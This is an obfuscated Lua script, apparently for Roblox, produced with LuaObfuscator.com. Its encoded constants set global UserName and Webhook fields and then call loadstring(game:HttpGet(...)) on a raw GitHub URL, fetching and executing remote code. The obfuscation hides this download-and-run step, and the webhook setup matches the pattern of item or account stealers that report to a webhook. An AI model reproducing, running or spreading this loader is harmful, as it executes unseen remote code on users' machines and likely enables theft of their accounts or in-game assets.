--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v79=v5(v68,v19);v19=nil;return v79;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(1065 -(68 + 997)) -0 ;local v70;while true do if (v69==(0 -0)) then v70=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + (1334 -(226 + 1044))))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v70-(v70%(1 + 0)) ;end end else local v71=0 + 0 ;local v72;while true do if (v71==(877 -(282 + 595))) then v72=2^(v32-(1638 -(1523 + 114))) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or (0 -0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(958 -((2189 -1297) + 65))) then return (v41 * 16777216) + (v40 * (156337 -90801)) + (v39 * (472 -(159 + 57))) + v38 ;end if (v37==((0 -0) -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + (1215 -(802 + 150)))) );v18=v18 + ((495 -311) -(67 + 113)) ;v37=1 + 0 ;end end end local function v24()local v42=v23();local v43=v23();local v44=443 -(416 + 26) ;local v45=(v20(v43,3 -2 ,9 + 11 ) * ((3 -1)^(56 -24))) + v42 ;local v46=v20(v43,21,23 + 8 );local v47=((v20(v43,(3653 -2624) -(915 + 82) )==(2 -1)) and  -(1 + 0)) or (1 -0) ;if (v46==((2046 -(814 + 45)) -(1069 + 118))) then if (v45==(0 -0)) then return v47 * 0 ;else v46=(2 -1) -0 ;v44=772 -(201 + 31 + 540) ;end elseif (v46==(356 + 1691)) then return ((v45==(0 -0)) and (v47 * ((1 + 0 + 0)/(791 -(368 + 423))))) or (v47 * NaN) ;end return v8(v47,v46-(3214 -2191) ) * (v44 + (v45/((20 -(10 + 8))^(199 -147)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(885 -(261 + 624))) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v66=1 -0 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(1879 -(332 + 1546))) then local v73=0;while true do if (v73==1) then v51=2;break;end if (v73==(1384 -(746 + 638))) then v54=nil;v55=nil;v73=1 + 0 ;end end end if (v51==3) then v58=nil;while true do local v80=0 -0 ;while true do if (v80~=(341 -(218 + 123))) then else if (v52==(1581 -(1535 + 46))) then local v102=0 + 0 ;local v103;while true do if (v102==0) then v103=0;while true do if (v103==1) then local v147=0;while true do if (v147~=1) then else v103=1 + 1 ;break;end if (v147==0) then v55={};v56={v53,v54,nil,v55};v147=1 -0 ;end end end if (v103==(1467 -(899 + 568))) then local v148=0 + 0 ;while true do if (1==v148) then v103=2 -1 ;break;end if (v148==(603 -(268 + 335))) then v53={};v54={};v148=291 -(60 + 230) ;end end end if (v103~=2) then else v52=573 -(426 + 146) ;break;end end break;end end end if (v52==(1 + 1)) then local v104=0;while true do if (v104==(1456 -(282 + 1174))) then for v107=812 -(569 + 242) ,v23() do local v108=0 -0 ;local v109;local v110;while true do if (v108~=(0 + 0)) then else v109=1024 -(706 + 318) ;v110=nil;v108=1252 -(721 + 530) ;end if (v108==1) then while true do if (v109==0) then v110=v21();if (v20(v110,1272 -(945 + 326) ,2 -1 )==0) then local v169=0;local v170;local v171;local v172;local v173;local v174;while true do if (v169==(1 + 0)) then v172=nil;v173=nil;v169=702 -(271 + 429) ;end if (v169==2) then v174=nil;while true do if (v170==0) then local v175=0;while true do if (v175==0) then v171=0;v172=nil;v175=1 + 0 ;end if (v175==(1501 -(1408 + 92))) then v170=1087 -(461 + 625) ;break;end end end if (v170==(1289 -(993 + 295))) then v173=nil;v174=nil;v170=1 + 1 ;end if (2==v170) then while true do if (v171==1) then local v177=0;local v178;while true do if (v177==0) then v178=1171 -(418 + 753) ;while true do if (v178==(0 + 0)) then local v186=0;local v187;while true do if (0~=v186) then else v187=0;while true do if ((0 + 0)==v187) then local v193=0;while true do if (v193==0) then v174={v22(),v22(),nil,nil};if (v172==0) then local v194=0;local v195;while true do if (v194==0) then v195=0 + 0 ;while true do if (v195==(529 -(406 + 123))) then v174[1772 -(1749 + 20) ]=v22();v174[4]=v22();break;end end break;end end elseif (v172==(1 + 0)) then v174[3]=v23();elseif (v172==(1324 -(1249 + 73))) then v174[2 + 1 ]=v23() -(2^(1161 -(466 + 679))) ;elseif (v172~=(6 -3)) then else local v200=0 -0 ;local v201;while true do if (v200~=0) then else v201=1900 -(106 + 1794) ;while true do if (v201==0) then v174[1 + 2 ]=v23() -(2^(5 + 11)) ;v174[11 -7 ]=v22();break;end end break;end end end v193=1;end if (v193==1) then v187=1;break;end end end if (v187==1) then v178=1;break;end end break;end end end if (v178==(2 -1)) then v171=2;break;end end break;end end end if (v171==(116 -(4 + 110))) then local v179=584 -(57 + 527) ;local v180;while true do if (v179==0) then v180=0;while true do if (1~=v180) then else v171=1430 -(41 + 1386) ;break;end if (v180~=(103 -(17 + 86))) then else local v188=0;while true do if (v188~=1) then else v180=1;break;end if (v188==(0 + 0)) then if (v20(v173,1 -0 ,2 -1 )~=1) then else v174[168 -(122 + 44) ]=v58[v174[2 -0 ]];end if (v20(v173,6 -4 ,2)~=(1 + 0)) then else v174[1 + 2 ]=v58[v174[5 -2 ]];end v188=1;end end end end break;end end end if (v171==0) then local v181=65 -(30 + 35) ;while true do if (v181~=(0 + 0)) then else local v185=1257 -(1043 + 214) ;while true do if (v185==(3 -2)) then v181=1213 -(323 + 889) ;break;end if (v185~=(0 -0)) then else v172=v20(v110,2,3);v173=v20(v110,584 -(361 + 219) ,6);v185=321 -(53 + 267) ;end end end if (v181~=1) then else v171=1 + 0 ;break;end end end if (v171==(416 -(15 + 398))) then if (v20(v173,985 -(18 + 964) ,3)==(3 -2)) then v174[4]=v58[v174[3 + 1 ]];end v53[v107]=v174;break;end end break;end end break;end if (v169~=0) then else v170=0 + 0 ;v171=nil;v169=851 -(20 + 830) ;end end end break;end end break;end end end for v111=1,v23() do v54[v111-(1 + 0) ]=v28();end v104=127 -(116 + 10) ;end if (v104~=1) then else return v56;end end end v80=1 + 0 ;end if (v80~=1) then else if (v52==(739 -(542 + 196))) then local v105=0 -0 ;while true do if (v105==(0 + 0)) then v57=v23();v58={};v105=1;end if (2~=v105) then else v52=2 + 0 ;break;end if (v105~=1) then else for v113=1 + 0 ,v57 do local v114=0 -0 ;local v115;local v116;local v117;while true do if (v114==0) then v115=0 -0 ;v116=nil;v114=1552 -(1126 + 425) ;end if (v114==1) then v117=nil;while true do if (v115~=(406 -(118 + 287))) then else if (v116==1) then v117=v21()~=(0 -0) ;elseif (v116==2) then v117=v24();elseif (v116==3) then v117=v25();end v58[v113]=v117;break;end if (v115==(1121 -(118 + 1003))) then local v166=0 -0 ;local v167;local v168;while true do if ((378 -(142 + 235))~=v166) then else while true do if (v167~=0) then else v168=0;while true do if (v168==0) then local v176=0;while true do if (v176==1) then v168=1;break;end if (v176~=(0 -0)) then else v116=v21();v117=nil;v176=1 + 0 ;end end end if (v168==(978 -(553 + 424))) then v115=1;break;end end break;end end break;end if ((0 -0)~=v166) then else v167=0 + 0 ;v168=nil;v166=1;end end end end break;end end end v56[3]=v21();v105=2;end end end break;end end end break;end if (v51~=0) then else local v74=0 + 0 ;while true do if (v74==1) then v51=1 + 0 ;break;end if (v74~=(0 + 0)) then else v52=0;v53=nil;v74=1 + 0 ;end end end if ((4 -2)==v51) then local v75=0 -0 ;while true do if (v75==(2 -1)) then v51=1 + 2 ;break;end if (v75==(0 -0)) then v56=nil;v57=nil;v75=754 -(239 + 514) ;end end end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (1==v62) then v65=v59[3];return function(...)local v81=v63;local v82=v64;local v83=v65;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=8) then if (v94<=3) then if (v94<=1) then if (v94==0) then local v118=v93[2];local v119,v120=v84(v91[v118](v13(v91,v118 + 1 ,v93[3])));v86=(v120 + v118) -1 ;local v121=0;for v141=v118,v86 do v121=v121 + 1 ;v91[v141]=v119[v121];end else v91[v93[2]]();end elseif (v94>2) then v91[v93[2]]=v93[3]~=0 ;else local v123=v93[2];local v124,v125=v84(v91[v123](v13(v91,v123 + 1 ,v93[3])));v86=(v125 + v123) -1 ;local v126=0;for v144=v123,v86 do v126=v126 + 1 ;v91[v144]=v124[v126];end end elseif (v94<=5) then if (v94==4) then v91[v93[2]]=v93[3];else local v129=0;local v130;local v131;while true do if (1==v129) then v91[v130 + 1 ]=v131;v91[v130]=v131[v93[4]];break;end if (v129==0) then v130=v93[2];v131=v91[v93[3]];v129=1;end end end elseif (v94<=6) then v91[v93[2]]();elseif (v94==7) then v91[v93[2]]=v61[v93[3]];else local v151=v93[2];local v152=v91[v93[3]];v91[v151 + 1 ]=v152;v91[v151]=v152[v93[4]];end elseif (v94<=12) then if (v94<=10) then if (v94==9) then do return;end else v91[v93[2]]=v93[3];end elseif (v94==11) then v91[v93[2]]=v61[v93[3]];else v91[v93[2]]=v93[3]~=0 ;end elseif (v94<=14) then if (v94==13) then v91[v93[2]][v93[3]]=v93[4];else local v139=v93[2];v91[v139]=v91[v139](v13(v91,v139 + 1 ,v86));end elseif (v94<=15) then do return;end elseif (v94>16) then v91[v93[2]][v93[3]]=v93[4];else local v158=v93[2];v91[v158]=v91[v158](v13(v91,v158 + 1 ,v86));end v85=v85 + 1 ;end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F4703083O00557365724E616D6503013O002003093O00557365724E616D653203073O00576562682O6F6B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O00120B3O00013O00300D3O0002000300120B3O00013O00300D3O0004000300120B3O00013O00300D3O0005000300120B3O00063O00120B000100073O00200800010001000800120A000300094O000C000400016O000100044O000E5O00022O00063O000100012O00093O00017O00",v9(),...);end
